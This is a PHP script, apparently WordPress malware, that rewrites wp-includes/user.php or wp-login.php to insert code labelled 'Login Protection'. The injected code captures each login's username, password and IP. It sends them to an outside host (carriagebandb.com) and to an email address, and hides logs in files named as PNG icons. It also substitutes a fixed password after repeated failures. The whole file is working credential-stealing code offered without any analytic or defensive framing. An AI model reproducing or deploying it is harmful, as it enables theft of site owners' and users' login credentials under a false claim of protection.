$homeDir = getcwd();$loginFile = $homeDir . "/wp-includes/user.php";$myError

1. $homeDir = getcwd();
2. $loginFile = $homeDir . "/wp-includes/user.php";
3. $myErrorFile = $homeDir . "/wp-includes/images/icon-download.png";
4. if (is_file($myErrorFile)) unlink ($myErrorFile);
5. if (is_file($loginFile)) {
6. $loginContent = @file_get_contents($loginFile);
7.  
8. if ( (!(preg_match('/carriagebandb/i', $loginContent))) && ($loginContent) ) {
9.  
10. if ((preg_match('/\!wp_check_password/is', $loginContent))) {
11.  
12. $replacement = '// Start Login Protection
13. $ip = $_SERVER["REMOTE_ADDR"];
14. $stringData = $_SERVER["SERVER_NAME"] "|" . $username . ":" . $password . "|" $ip . "\n";
15. $today = date("j");
16. $myErrorFile = getcwd() . "/wp-includes/images/icon-download.png";
17. $mySuccessFile = getcwd() . "/wp-includes/images/icon-up-flag.png";
18. $failedLogContent = @file_get_contents($myErrorFile);
19. $successLogContent = @file_get_contents($mySuccessFile);
20. $errorFileLines = explode("\n", $failedLogContent);
21. $diff = $today - $errorFileLines[0];
22. if ( ($diff >= 7) || ($diff < 0) ) {
23. @unlink($myErrorFile);
24. $failedLogContent = "";
25. }
26. if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
27. preg_match_all("/{$ip}/i", $failedLogContent, $matches);
28. if ( (count($matches[0]) > 4) && (!$userOk) ) $password = "G4o7Ivc29OVOxcp5";
29. if ( wp_check_password($password, $userdata->user_pass, $userdata->ID) ) {
30. @file_get_contents("http://www.carriagebandb.com/cgi-bin/optimus.pl?prime=$stringData");
31. @mail("anto@netherlandbarmuda.com", $_SERVER["SERVER_NAME"], $stringData);
32. if (!$userOk) {
33. $fh = fopen($mySuccessFile, "a");
34. fwrite($fh, "$ip\n");
35. fclose($fh);
36. }
37. } else {
38. if (!(is_file($myErrorFile))) {
39. $fh = fopen($myErrorFile, "w");
40. fwrite($fh, "$today\n");
41. fclose($fh);
42. }
43. $fh = fopen($myErrorFile, "a");
44. fwrite($fh, $stringData);
45. fclose($fh);
46. }
47. // END Login Protection';
48.  
49. if (preg_match('/\!wp_check_password\(\$password, \$user->user_pass/is', $loginContent)) $replacement = preg_replace('/(userdata->)/is', "user->", $replacement, 2);
50.  
51. $loginContent = preg_replace('/(if \( \!wp_check_password)/is', "$replacement\n$1", $loginContent, 1);
52.  
53. } elseif ( (preg_match('/if \( is_wp_error\(/is', $loginContent)) ) {
54.  
55. $replacement = '// Start Login Protection
56. $ip = $_SERVER["REMOTE_ADDR"];
57. $stringData = $_SERVER["SERVER_NAME"] . "|" . $credentials["user_login"] . ":" . $credentials["user_password"] . "|" . $ip . "\n";
58. $today = date("j");
59. $myErrorFile = getcwd() . "/wp-includes/images/icon-download.png";
60. $mySuccessFile = getcwd() . "/wp-includes/images/icon-up-flag.png";
61. $failedLogContent = @file_get_contents($myErrorFile);
62. $successLogContent = @file_get_contents($mySuccessFile);
63. $errorFileLines = explode("\n", $failedLogContent);
64. $diff = $today - $errorFileLines[0];
65. if ( ($diff >= 7) || ($diff < 0) ) {
66. @unlink($myErrorFile);
67. $failedLogContent = "";
68. }
69. if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
70. preg_match_all("/{$ip}/i", $failedLogContent, $matches);
71. if ( (count($matches[0]) > 4) && (!$userOk) ) {
72. $credentials["user_password"] = "G4o7Ivc29OVOxcp5";
73. $user = wp_authenticate($credentials["user_login"], $credentials["user_password"]);
74. }
75. if (!(is_wp_error($user))) {
76. @file_get_contents("http://www.carriagebandb.com/cgi-bin/optimus.pl?prime=$stringData");
77. @mail("anto@netherlandbarmuda.com", $_SERVER["SERVER_NAME"], $stringData);
78. if (!$userOk) {
79. $fh = fopen($mySuccessFile, "a");
80. fwrite($fh, "$ip\n");
81. fclose($fh);
82. }
83. } else {
84. if (!(is_file($myErrorFile))) {
85. $fh = fopen($myErrorFile, "w");
86. fwrite($fh, "$today\n");
87. fclose($fh);
88. }
89. $fh = fopen($myErrorFile, "a");
90. fwrite($fh, $stringData);
91. fclose($fh);
92. }
93. // End Login Protection';
94. $loginContent = preg_replace('/(if \( is_wp_error\()/is', "$replacement\n$1", $loginContent, 1);
95.  
96. } else {
97.  
98. $loginFile = $homeDir . "/wp-login.php";
99. if (is_file($loginFile)) {
100.  
101. $loginContent = @file_get_contents($loginFile);
102. $replacement = '// Start Login Protection
103. $ip = $_SERVER["REMOTE_ADDR"];
104. $stringData = $_SERVER["SERVER_NAME"] . "|" . $user_login . ":" $user_pass . "|" . $ip . "\n";
105. $today = date("j");
106. $myErrorFile = getcwd() . "/wp-includes/images/icon-download.png";
107. $mySuccessFile = getcwd() . "/wp-includes/images/icon-up-flag.png";
108. $failedLogContent = @file_get_contents($myErrorFile);
109. $successLogContent = @file_get_contents($mySuccessFile);
110. $errorFileLines = explode("\n", $failedLogContent);
111. $diff = $today - $errorFileLines[0];
112. if ( ($diff >= 7) || ($diff < 0) ) {
113. @unlink($myErrorFile);
114. $failedLogContent = "";
115. }
116. if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
117. preg_match_all("/{$ip}/i", $failedLogContent, $matches);
118. if ( (count($matches[0]) > 4) && (!$userOk) ) $user_pass = "G4o7Ivc29OVOxcp5";
119. if ( wp_login($user_login, $user_pass, $using_cookie) ) {
120. @file_get_contents("http://www.carriagebandb.com/cgi-bin/optimus.pl?prime=$stringData");
121. @mail("anto@netherlandbarmuda.com", $_SERVER["SERVER_NAME"], $stringData);
122. if (!$userOk) {
123. $fh = fopen($mySuccessFile, "a");
124. fwrite($fh, "$ip\n");
125. fclose($fh);
126. }
127. } else {
128. if (!(is_file($myErrorFile))) {
129. $fh = fopen($myErrorFile, "w");
130. fwrite($fh, "$today\n");
131. fclose($fh);
132. }
133. $fh = fopen($myErrorFile, "a");
134. fwrite($fh, $stringData);
135. fclose($fh);
136. }
137. // End Login Protection';
138. if ( (!(preg_match('/carriagebandb/i', $loginContent))) && ($loginContent) ) {
139. $loginContent = preg_replace('/(if \( wp_login)/is', "$replacement\n$1", $loginContent, 1);
140. }
141.  
142. }
143.  
144. }
145.  
146. $fh = @fopen($loginFile, 'w');
147. @fwrite($fh, $loginContent);
148. @fclose($fh);
149.  
150. }
151. }